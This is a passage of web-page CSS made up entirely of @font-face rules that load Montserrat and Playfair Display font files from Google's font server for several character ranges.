700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: 